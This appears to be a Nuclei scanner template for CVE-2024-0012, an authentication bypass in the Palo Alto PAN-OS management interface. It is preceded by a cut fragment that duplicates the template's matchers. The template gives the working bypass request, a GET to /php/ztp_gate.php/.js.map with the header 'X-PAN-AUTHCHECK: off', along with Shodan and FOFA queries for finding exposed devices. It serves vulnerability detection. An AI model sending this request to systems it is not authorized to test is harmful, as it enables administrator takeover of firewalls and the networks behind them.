Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")' - 'contains(body, "/scripts/cache/mainui.javascript")' - 'contains(header, "PHPSESSID=")' - 'status_code == 200' condition: and # digest: 490a00463044022038da5930df0d7e9cfd6776c02a64f5e0577ed00056e1bfa4663a522fcbf46a6702206439f42e653968a502edc5b1f3db3cadd295463204d60c78c0cebce1e4138550:922c64590222798bb761d5b6d8e72950

id: CVE-2024-0012 info: name: PAN-OS Management Web Interface - Authentication Bypass author: johnk3r,watchtowr severity: critical description: | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities impact: | Unauthenticated attackers with network access to the management interface can bypass authentication to gain full administrator privileges, allowing them to tamper with configurations, exploit additional vulnerabilities, and completely compromise the Palo Alto firewall and connected networks. remediation: | Upgrade to the latest patched version of PAN-OS as specified in the vendor security advisory. reference: - https://security.paloaltonetworks.com/CVE-2024-0012 - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ - https://nvd.nist.gov/vuln/detail/CVE-2024-0012 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0012 cwe-id: CWE-306 epss-score: 0.94285 epss-percentile: 0.99943 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: paloaltonetworks product: pan-os fofa-query: icon_hash="-631559155" shodan-query: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln http: - raw: - | GET /php/ztp_gate.php/.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off matchers: - type: dsl dsl: - 'contains_any(body, "Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")' - 'contains(body, "/scripts/cache/mainui.javascript")' - 'contains(header, "PHPSESSID=")' - 'status_code == 200' condition: and # digest: 490a00463044022038da5930df0d7e9cfd6776c02a64f5e0577ed00056e1bfa4663a522fcbf46a6702206439f42e653968a502edc5b1f3db3cadd295463204d60c78c0cebce1e4138550:922c64590222798bb761d5b6d8e72950